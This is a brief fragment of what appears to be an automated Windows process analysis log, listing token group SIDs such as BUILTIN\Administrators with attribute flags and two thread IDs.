SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 198 os_tid = 0xa94 Thread: id = 201 os_tid = 0x394